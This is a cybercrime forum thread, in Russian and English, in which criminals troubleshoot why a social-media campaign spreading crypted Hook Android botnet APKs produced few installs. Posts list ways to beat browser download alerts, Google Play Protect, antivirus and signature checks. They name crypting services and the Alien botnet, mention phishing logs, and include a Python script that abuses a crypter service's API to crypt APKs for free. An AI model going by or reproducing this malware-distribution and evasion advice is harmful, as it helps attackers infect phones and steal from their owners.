You have more than 1200 unique encrypted apk files in your possession. You have enabled each clicker on your social media traffic to download a unique apk file. All 1200 apks were downloaded, but the corresponding installation count did not exceed 30. Where do you think the problem is here?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Android APK Question
- Автор темы tengrist333
- Дата начала
- Автор темы
- Добавить закладку
- #2
В вашем распоряжении более 1200 уникальных зашифрованных файлов apk. Вы разрешили каждому кликеру на своем трафике в социальных сетях загрузить уникальный файл apk. Все 1200 apk-файлов были загружены, но соответствующее количество установок не превысило 30. Где вы думаете, проблема здесь?
Проблем много, от не знания как установить файл на смартфон и до много всего,
- красный домен
- тупой юзер
- алерт на скачку, бразуер блочит файл и кричит что это вирус/опасный апп и так далее, хотя админка отдала файл и считает что он скачан, на самом деле это не так
- нет валидной подписи у файла, инсталлятор гугла будет орать и всячески мешать установке
- АВ будут блокировать, АВ в андроиде работает с повышенными привелигиями, а бывает что от имени системы
- нет права на установку приложение у того браузера, через который качают
- гугл протект очень опасная вещь, если бот замаран, он будет орать, и отправит файл на проверку в гугл
- кривой крипт - ой как часто
- несоотвествие версий андроида, например, бот работает от 8 версии а качают с 6 версии
жёсткий рандом
- Автор темы
- Добавить закладку
- #6
The 'rat' used is an expensive 'Hook botnet' encryption system in the market, and when APKs from 'apkmorph.com' were encrypted, there was no 'AV' or Google Protect barrier. It has been tested with multiple real devices and through BrowserStack. Traffic sources include Facebook, Instagram, Twitter, and TikTok
Используемый «rat» - это дорогая система шифрования «Hook botnet» на рынке, и когда APK-файлы с «%site%.com» были зашифрованы, не было никаких преград от «AV» или Google Protect. Тестирование проводилось на нескольких реальных устройствах и через BrowserStack. Источники трафика включают Facebook, Instagram, Twitter и TikTok.
Используемый «rat» - это дорогая система шифрования «Hook botnet» на рынке, и когда APK-файлы с «%site%.com» были зашифрованы, не было никаких преград от «AV» или Google Protect. Тестирование проводилось на нескольких реальных устройствах и через BrowserStack. Источники трафика включают Facebook, Instagram, Twitter и TikTok.
signature is there )
Прежде всего, спасибо за непреднамеренную рекламу)) Но в любом случае попросил бы вас впредь не давать линк на наш сервис, поскольку это противоречит правилам нашего сервиса. Мы выдаем линк на сайт при личной беседе после верификации в ПМ
Ну и по вашему посту смущают 2 момента очень сильно:
1. В самом начале вы утверждаете, что у вас 1200 криптованных сэмплов
)) У нас такого клиента за всю историю сервиса не было, кто бы взял 1200 криптованных файлов)) Просто возьмите калькулятор и посчитайте сколько это выйдет по стомости 2. DukeEugene и RedDragon (кодер) андроид бота Hook НЕ работают с людьми из Турции насколько мне изветсно, хотя я могу ошибиться на этот счет.
Что касается вашего вопроса. Вам необходимо тестировать каждый шаг для выявления проблемы. Самое первое подозрение это может быть алерт от Google Chrome браузера (file may be harmfull) при скачивании с лэндига . Этот вопрос должен решаться на стороне лэндига. Если не ошибаюсь нужны правильные фильтры для кноки Download. Данный вопрос обсуждается многими траферами на эксплоите и вероятно кто то из них уже имеет решение.
- Автор темы
- Добавить закладку
- #9
Привет, "GoldenCrypt", на вашем веб-сайте "apkmorph.com" есть уязвимость. Если вы загружаете apk-файлы один за другим без скачивания или отправляете несколько запросов с помощью bash-скриптов, вы можете бесконечно шифровать apk-файлыПрежде всего, спасибо за непреднамеренную рекламу)) Но в любом случае попросил бы вас впредь не давать линк на наш сервис, поскольку это противоречит правилам нашего сервиса. Мы выдаем линк на сайт при личной беседе после верификации в ПМ
Ну и по вашему посту смущают 2 момента очень сильно:
1. В самом начале вы утверждаете, что у вас 1200 криптованных сэмплов
2. DukeEugene и RedDragon (кодер) андроид бота Hook НЕ работают с людьми из Турции насколько мне изветсно, хотя я могу ошибиться на этот счет.
Что касается вашего вопроса. Вам необходимо тестировать каждый шаг для выявления проблемы. Самое первое подозрение это может быть алерт от Google Chrome браузера (file may be harmfull) при скачивании с лэндига . Этот вопрос должен решаться на стороне лэндига. Если не ошибаюсь нужны правильные фильтры для кноки Download. Данный вопрос обсуждается многими траферами на эксплоите и вероятно кто то из них уже имеет решение.
Спасибо, что случайно оставили комментарии к темам После того, как вы решите проблемы с кодом, напишите мне снова. Я расскажу вам о еще одной уязвимости.apk.zip - AnonFiles
anonfiles.com
- Автор темы
- Добавить закладку
- #10
Я не думаю, что у меня есть проблемы с моими лендинг-страницами или созданными мной apk-файлами. Если бы вы немного посмотрели на логи вашего сервера, возможно, вы бы поняли, что этот секретный клиент - это я. Я продолжу рекламировать ваш сервис
День добрый, благодарю за инфуПривет, "GoldenCrypt", на вашем веб-сайте "apkmorph.com" есть уязвимость. Если вы загружаете apk-файлы один за другим без скачивания или отправляете несколько запросов с помощью bash-скриптов, вы можете бесконечно шифровать apk-файлы
apk.zip - AnonFiles
anonfiles.com
Уже дал команду все проверить. Если твои слова подтвердятся, то разумеется соответствующий человек в команде получит по шапке))
Ну и сайт вероятно временно прикроем, пока не устраним все траблы.
А на счет 2ой уязвимости, можешь отписать либо тут либо мне в ПМ.
Готов выслать тебе немного $ (в меру своих возможностей) в качестве благодарности
- Автор темы
- Добавить закладку
- #12
Немного долларов отправь, я обещаю рассказать тебе о другой уязвимостиДень добрый, благодарю за инфу
Уже дал команду все проверить. Если твои слова подтвердятся, то разумеется соответствующий человек в команде получит по шапке))
Ну и сайт вероятно временно прикроем, пока не устраним все траблы.
А на счет 2ой уязвимости, можешь отписать либо тут либо мне в ПМ.
Готов выслать тебе немного $ (в меру своих возможностей) в качестве благодарности
- Автор темы
- Добавить закладку
- #13
Если вы отправляете свои услуги за 1 доллар на покупку, вы можете отправить их за 5 долларов. Убедитесь, что вы отправили сумму, это не имеет значения. можешь проверитьДень добрый, благодарю за инфу
Уже дал команду все проверить. Если твои слова подтвердятся, то разумеется соответствующий человек в команде получит по шапке))
Ну и сайт вероятно временно прикроем, пока не устраним все траблы.
А на счет 2ой уязвимости, можешь отписать либо тут либо мне в ПМ.
Готов выслать тебе немного $ (в меру своих возможностей) в качестве благодарности
- Автор темы
- Добавить закладку
- #14
День добрый, благодарю за инфу
Уже дал команду все проверить. Если твои слова подтвердятся, то разумеется соответствующий человек в команде получит по шапке))
Ну и сайт вероятно временно прикроем, пока не устраним все траблы.
А на счет 2ой уязвимости, можешь отписать либо тут либо мне в ПМ.
Готов выслать тебе немного $ (в меру своих возможностей) в качестве благодарности
Код:
import requests
url = "https://apkmorph.com/api/morph"
headers = {
"User-Agent": "XXXXXXXXXXXXXXXXXXXXXXXXXX",
"Referer": "https://apkmorph.com/",
"X-CSRF-TOKEN": "XXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"X-Requested-With": "XMLHttpRequest",
"sec-ch-ua": '"XXXXXXXXXXXXXXXXXXXXXXXXX"',
"sec-ch-ua-mobile": "XXXXXXXXXXXXXXXXXXXX",
"sec-ch-ua-platform": '"XXXXXXXXXXXX"',
"Accept": "application/json, text/plain, */*",
}
for i in range(1):
token = "2ecd610223bf459d91cae9b944020042"
params = {"token": token}
with open("c.apk", "rb") as f:
files = {"file": ("c.apk", f.read(), "application/vnd.android.package-archive")}
response = requests.post(url, headers=headers, params=params, files=files)
print(response.text)Хорошо, все проверим, спасибо!Если вы отправляете свои услуги за 1 доллар на покупку, вы можете отправить их за 5 долларов. Убедитесь, что вы отправили сумму, это не имеет значения. можешь проверить
Запросил твой BTC кошелек в ПМ )) Вышли мне кошелек, отблагодарю!
В любом случае, бэкенд сайта перепишут с нуля. Сайт пока недоступен. Работаем в ручном режиме.
- Автор темы
- Добавить закладку
- #16
Решение ошибок не означает, что это ответ на мой вопрос.
Выше другие мемберы также выдвигали свои предположения. Однозначного ответа очевидно тебе никто не сможет дать.
Совет только один проверять каждый шаг для выявления причины проблемы. Как я отмечал выше проверь тот алерт от Google Chrome браузера "File may be harmful" при скачивании с лэндинга. С этим алертом сталкиваются даже очень опытные траферы, с регистрацией на эксплоит форуме от 2010 года.
Говорить "вряд ли у меня есть такая проблема" - это не выход из положения
Нужно по факту проверять, если ты действительно настроен найти причину проблемы.Пункт по криптованным apk, ты сам озвучил. Сверх того, криптор ничего не делает раз файл чист и работает точно так же как оригинал. В любом случае, Hook криптовали все клиенты, что были у селлера и нареканий также не было.
Один из важных моментов также - качество трафика.
Также хочу отметить такой момент, если ты действительно использовал Hook. У них было время когда Hook не на всех девайсах корректно брал пермишены (права). И кодер Hook пофиксил этот момент, разумеется это заняло некоторое время. Но лично я, не думаю, что проблема была на стороне бота, поскольку я знаю как тщательно тестирует билды Duke перед выдачей клиенту.
Последнее редактирование:
Bad encryption maybe! damaged payloads , or blocked due to alerts and AV's , device security..etc
Он писал уже про этот момент. Очевидно проблема в чем то другом
- Автор темы
- Добавить закладку
- #20
As I mentioned before, I used 'apkmorph.com' and my traffic sources are not erotic websites or pop-up ads. My traffic comes from social media and the Alien botnet. Everyone knows that Alien is flawed and unreliable. However, when I created a new Alien APK file while using Hook, I noticed that it received more installations and ironically stayed alive longer than Hook. There are no issues with my download site, it has been checked. We even tried the same traffic source with phishing ads, and the ad itself was the same. But the botnet doesn't respond to Hook, only phishing. Phishing logs were coming in. This is not my problem; I want a user manual and a report. Don't waste $7000. I also tried other friends who do private encryption, don't worry. There's no issue with encryption, it's just that Hook sucks
Как я уже упоминал ранее, я использовал 'apkmorph.com', и мои источники трафика - это не эротические сайты или всплывающие рекламные окна. Мой трафик идет из социальных сетей и ботнета Alien. Все знают, что Alien имеет недостатки и не надежен. Однако, когда я создал новый файл APK Alien при использовании Hook, я заметил, что он получил больше установок и, иронично, оставался в живых дольше, чем Hook. С моим сайтом для загрузки нет проблем, он был проверен. Мы даже попробовали использовать одинаковый источник трафика с фишинговой рекламой, и сама реклама была такая же. Но ботнет не реагирует на Hook, только на фишинг. Поступали логи фишинга. Это не моя проблема, я хочу руководства пользователя и отчета. Не тратьте $7000 зря. Я также пробовал других друзей, которые занимаются частным шифрованием, не волнуйтесь. Проблем с шифрованием нет, просто Hook плох